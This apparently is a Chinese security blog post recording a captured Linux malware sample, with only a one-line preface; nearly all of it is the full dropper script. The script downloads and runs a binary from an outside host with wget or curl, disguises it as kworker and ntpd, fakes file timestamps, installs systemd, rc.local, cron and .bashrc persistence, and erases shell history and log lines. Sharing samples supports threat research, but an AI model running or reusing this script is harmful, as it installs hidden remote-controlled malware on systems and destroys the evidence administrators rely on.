自动化计划任务及服务权限维持样本

前言:项目中抓到了个样本,这边进行简单的记录

os=`uname -a | grep el6`
if [[ $os = '' ]]
then
    id=`sudo -n id` 
    if [[ $id = '' ]]
    then
        chattr -f -i /tmp/kworker /tmp/.kworker /var/tmp/kworker /var/tmp/.kworker /dev/shm/kworker /dev/shm/.kworker /usr/bin/.kworker /usr/bin/kworker /tmp/xfsalloc /tmp/.xfsalloc /var/tmp/xfsalloc /var/tmp/.xfsalloc /dev/shm/xfsalloc /dev/shm/.xfsalloc /usr/bin/.xfsalloc /usr/bin/xfsalloc
        chattr -f -a /tmp/kworker /tmp/.kworker /var/tmp/kworker /var/tmp/.kworker /dev/shm/kworker /dev/shm/.kworker /usr/bin/.kworker /usr/bin/kworker /tmp/xfsalloc /tmp/.xfsalloc /var/tmp/xfsalloc /var/tmp/.xfsalloc /dev/shm/xfsalloc /dev/shm/.xfsalloc /usr/bin/.xfsalloc /usr/bin/xfsalloc
        rm -rf /tmp/kworker /tmp/.kworker /var/tmp/kworker /var/tmp/.kworker /dev/shm/kworker /dev/shm/.kworker /usr/bin/.kworker /usr/bin/kworker /tmp/xfsalloc /tmp/.xfsalloc /var/tmp/xfsalloc /var/tmp/.xfsalloc /dev/shm/xfsalloc /dev/shm/.xfsalloc /usr/bin/.xfsalloc /usr/bin/xfsalloc
        wget -qO /var/tmp/kworker http://api.api2-cdn.com/kworkerps3q || curl -so /var/tmp/kworker http://api.api2-cdn.com/kworkerps3q
        chmod +x /var/tmp/kworker
		(touch -r $(which ls) /lib/ntpd)|| (touch -r $(whereis ls | awk '{print $2}') /lib/ntpd)
		(touch -r $(which ls) /var/tmp/kworker)|| (touch -r $(whereis ls | awk '{print $2}') /var/tmp/kworker)
        /var/tmp/kworker
        bashrc=`cat .bashrc | grep -v kworker`;echo "${bashrc}" > ~/.bashrc
        #echo "atd=\`ps -ef | grep atd | grep -v grep | grep -v f | awk '{print \$2}'\`;kworker=\`ps -ef | grep shm/kworker | grep -v grep | awk '{print \$2}'\`;if [[ \$atd = '' ]] && [[ \$kworker = '' ]];then rm -rf /var/tmp/kworker;wget -qO /var/tmp/kworker http://api.api2-cdn.com/kworkerps3q || curl -so /var/tmp/kworker http://api.api2-cdn.com/kworkerps3q;chmod +x /var/tmp/kworker;/var/tmp/kworker;fi" >> ~/.bashrc
        crontab -l | grep -v "kworker" | crontab
        #(crontab -l;echo "* * * * * bash -c \"atd=\\\`ps -ef | grep atd | grep -v grep | grep -v f | awk '{print \\\$2}'\\\`;kworker=\\\`ps -ef | grep shm/kworker | grep -v grep | awk '{print \\\$2}'\\\`;if [[ \\\$atd = '' ]] && [[ \\\$kworker = '' ]];then rm -rf /var/tmp/kworker;wget -qO /var/tmp/kworker http://api.api2-cdn.com/kworkerps3q || curl -so /var/tmp/kworker http://api.api2-cdn.com/kworkerps3q;chmod +x /var/tmp/kworker;/var/tmp/kworker;fi\"") | crontab
        unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0
		find /var/log/ 2>/dev/null | xargs -i sed -i "/kworker/d" {} 2>/dev/null
    else
        sudo chattr -f -i /lib/ntpd /tmp/kworker /tmp/.kworker /var/tmp/kworker /var/tmp/.kworker /dev/shm/kworker /dev/shm/.kworker /usr/bin/.kworker /usr/bin/kworker /tmp/xfsalloc /tmp/.xfsalloc /var/tmp/xfsalloc /var/tmp/.xfsalloc /dev/shm/xfsalloc /dev/shm/.xfsalloc /usr/bin/.xfsalloc /usr/bin/xfsalloc
        sudo chattr -f -a /lib/ntpd /tmp/kworker /tmp/.kworker /var/tmp/kworker /var/tmp/.kworker /dev/shm/kworker /dev/shm/.kworker /usr/bin/.kworker /usr/bin/kworker /tmp/xfsalloc /tmp/.xfsalloc /var/tmp/xfsalloc /var/tmp/.xfsalloc /dev/shm/xfsalloc /dev/shm/.xfsalloc /usr/bin/.xfsalloc /usr/bin/xfsalloc
        sudo mkdir /lib/
        sudo rm -rf /lib/ntpd /tmp/kworker /tmp/.kworker /var/tmp/kworker /var/tmp/.kworker /dev/shm/kworker /dev/shm/.kworker /usr/bin/.kworker /usr/bin/kworker /tmp/xfsalloc /tmp/.xfsalloc /var/tmp/xfsalloc /var/tmp/.xfsalloc /dev/shm/xfsalloc /dev/shm/.xfsalloc /usr/bin/.xfsalloc /usr/bin/xfsalloc
        sudo wget -qO /lib/ntpd http://api.api2-cdn.com/kworkerps3q || sudo curl -so /lib/ntpd http://api.api2-cdn.com/kworkerps3q
        sudo chmod +x /lib/ntpd
        sudo systemctl -q disable kworker
        sudo rm -rf /lib/systemd/system/kworker.service
        sudo systemctl daemon-reload
        sudo systemctl reset-failed
        sudo systemctl daemon-reload
        sudo bash -c 'cat << EOF > /lib/systemd/system/kworker.service
 
[Unit]
After=network.target
[Service]
Type=forking
ExecStart=/lib/ntpd
Restart=always
[Install]
WantedBy=multi-user.target
EOF'
        sudo systemctl daemon-reload
        sudo systemctl reset-failed
        sudo systemctl -q enable kworker
        sudo systemctl start kworker
        sudo /lib/ntpd
		(touch -r $(which ls) /lib/ntpd)|| (touch -r $(whereis ls | awk '{print $2}') /lib/ntpd)
		(touch -r $(which ls) /var/tmp/kworker)|| (touch -r $(whereis ls | awk '{print $2}') /var/tmp/kworker)
        sudo unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0
		sudo bash -c 'find /var/log/ 2>/dev/null | xargs -i sed -i "/kworker/d" {} 2>/dev/null'
        sudo bash -c 'find /var/log/ 2>/dev/null | xargs -i sed -i "/ntpd/d" {} 2>/dev/null'
        sudo bash -c 'find /var/log/ 2>/dev/null | xargs -i sed -i "/xfsalloc/d" {} 2>/dev/null'
 
    fi
else 
    id=`sudo -n id`
    if [[ $id = '' ]]
    then
        chattr -f -i /tmp/kworker /tmp/.kworker /var/tmp/kworker /var/tmp/.kworker /dev/shm/kworker /dev/shm/.kworker /usr/bin/.kworker /usr/bin/kworker /tmp/xfsalloc /tmp/.xfsalloc /var/tmp/xfsalloc /var/tmp/.xfsalloc /dev/shm/xfsalloc /dev/shm/.xfsalloc /usr/bin/.xfsalloc /usr/bin/xfsalloc
        chattr -f -a /tmp/kworker /tmp/.kworker /var/tmp/kworker /var/tmp/.kworker /dev/shm/kworker /dev/shm/.kworker /usr/bin/.kworker /usr/bin/kworker /tmp/xfsalloc /tmp/.xfsalloc /var/tmp/xfsalloc /var/tmp/.xfsalloc /dev/shm/xfsalloc /dev/shm/.xfsalloc /usr/bin/.xfsalloc /usr/bin/xfsalloc
        rm -rf /tmp/kworker /tmp/.kworker /var/tmp/kworker /var/tmp/.kworker /dev/shm/kworker /dev/shm/.kworker /usr/bin/.kworker /usr/bin/kworker /tmp/xfsalloc /tmp/.xfsalloc /var/tmp/xfsalloc /var/tmp/.xfsalloc /dev/shm/xfsalloc /dev/shm/.xfsalloc /usr/bin/.xfsalloc /usr/bin/xfsalloc
        wget -qO /var/tmp/kworker http://api.api2-cdn.com/kworkerps3q || curl -so /var/tmp/kworker http://api.api2-cdn.com/kworkerps3q
        chmod +x /var/tmp/kworker
		(touch -r $(which ls) /lib/ntpd)|| (touch -r $(whereis ls | awk '{print $2}') /lib/ntpd)
		(touch -r $(which ls) /var/tmp/kworker)|| (touch -r $(whereis ls | awk '{print $2}') /var/tmp/kworker)
        /var/tmp/kworker
        bashrc=`cat .bashrc | grep -v kworker`;echo "${bashrc}" > ~/.bashrc
        #echo "atd=\`ps -ef | grep atd | grep -v grep | grep -v f | awk '{print \$2}'\`;kworker=\`ps -ef | grep shm/kworker | grep -v grep | awk '{print \$2}'\`;if [[ \$atd = '' ]] && [[ \$kworker = '' ]];then rm -rf /var/tmp/kworker;wget -qO /var/tmp/kworker http://api.api2-cdn.com/kworkerps3q || curl -so /var/tmp/kworker http://api.api2-cdn.com/kworkerps3q;chmod +x /var/tmp/kworker;/var/tmp/kworker;fi" >> ~/.bashrc
        crontab -l | grep -v "kworker" | crontab
        #(crontab -l;echo "* * * * * bash -c \"atd=\\\`ps -ef | grep atd | grep -v grep | grep -v f | awk '{print \\\$2}'\\\`;kworker=\\\`ps -ef | grep shm/kworker | grep -v grep | awk '{print \\\$2}'\\\`;if [[ \\\$atd = '' ]] && [[ \\\$kworker = '' ]];then rm -rf /var/tmp/kworker;wget -qO /var/tmp/kworker http://api.api2-cdn.com/kworkerps3q || curl -so /var/tmp/kworker http://api.api2-cdn.com/kworkerps3q;chmod +x /var/tmp/kworker;/var/tmp/kworker;fi\"") | crontab
        unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0
		find /var/log/ 2>/dev/null | xargs -i sed -i "/kworker/d" {} 2>/dev/null
    else
        sudo chattr -f -i /lib/ntpd /tmp/kworker /tmp/.kworker /var/tmp/kworker /var/tmp/.kworker /dev/shm/kworker /dev/shm/.kworker /usr/bin/.kworker /usr/bin/kworker /tmp/xfsalloc /tmp/.xfsalloc /var/tmp/xfsalloc /var/tmp/.xfsalloc /dev/shm/xfsalloc /dev/shm/.xfsalloc /usr/bin/.xfsalloc /usr/bin/xfsalloc
        sudo chattr -f -a /lib/ntpd /tmp/kworker /tmp/.kworker /var/tmp/kworker /var/tmp/.kworker /dev/shm/kworker /dev/shm/.kworker /usr/bin/.kworker /usr/bin/kworker /tmp/xfsalloc /tmp/.xfsalloc /var/tmp/xfsalloc /var/tmp/.xfsalloc /dev/shm/xfsalloc /dev/shm/.xfsalloc /usr/bin/.xfsalloc /usr/bin/xfsalloc
        sudo rm -rf /lib/ntpd /tmp/kworker /tmp/.kworker /var/tmp/kworker /var/tmp/.kworker /dev/shm/kworker /dev/shm/.kworker /usr/bin/.kworker /usr/bin/kworker /tmp/xfsalloc /tmp/.xfsalloc /var/tmp/xfsalloc /var/tmp/.xfsalloc /dev/shm/xfsalloc /dev/shm/.xfsalloc /usr/bin/.xfsalloc /usr/bin/xfsalloc
        sudo wget -qO /lib/ntpd http://api.api2-cdn.com/kworkerps3q || sudo curl -so /lib/ntpd http://api.api2-cdn.com/kworkerps3q
        sudo chmod +x /lib/ntpd
		(touch -r $(which ls) /lib/ntpd)|| (touch -r $(whereis ls | awk '{print $2}') /lib/ntpd)
		(touch -r $(which ls) /var/tmp/kworker)|| (touch -r $(whereis ls | awk '{print $2}') /var/tmp/kworker)
        sudo /lib/ntpd
        sudo sed -i s/\\/usr\\/bin\\/kworker//g /etc/rc.d/rc.local
        sudo sed -i s/\\/lib\\/ntpd//g /etc/rc.d/rc.local
        echo "echo '/lib/ntpd' >> /etc/rc.d/rc.local" | sudo sh
        sudo chmod +x /etc/rc.d/rc.local
        sudo unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0
		sudo bash -c 'find /var/log/ 2>/dev/null | xargs -i sed -i "/kworker/d" {} 2>/dev/null'
        sudo bash -c 'find /var/log/ 2>/dev/null | xargs -i sed -i "/ntpd/d" {} 2>/dev/null'
        sudo bash -c 'find /var/log/ 2>/dev/null | xargs -i sed -i "/xfsalloc/d" {} 2>/dev/null'
    fi
fi
posted @   zpchcbd  阅读(36)  评论(0编辑  收藏  举报
相关博文:
· patchelf劫持动态链接库实现权限维持和权限提升
· PrintSpoofer漏洞以及本地提权利用分析
· taskschd.msc 是 Windows 操作系统中的任务计划程序(Task Scheduler)管理工具。它允许用户创建、管理和监控定期执行的任务。通过任务计划程序,您可以设置系统在特定时间或特定事件发生时自动运行程序或脚本。
· 操作系统权限维持(四)之Windows系统-计划任务维持后门
· 07_Linux基础-计划任务-备份脚本-变量定义和使用
阅读排行:
· 开源Multi-agent AI智能体框架aevatar.ai,欢迎大家贡献代码
· Manus重磅发布:全球首款通用AI代理技术深度解析与实战指南
· 被坑几百块钱后,我竟然真的恢复了删除的微信聊天记录!
· 没有Manus邀请码?试试免邀请码的MGX或者开源的OpenManus吧
· 园子的第一款AI主题卫衣上架——"HELLO! HOW CAN I ASSIST YOU TODAY
点击右上角即可分享
微信分享提示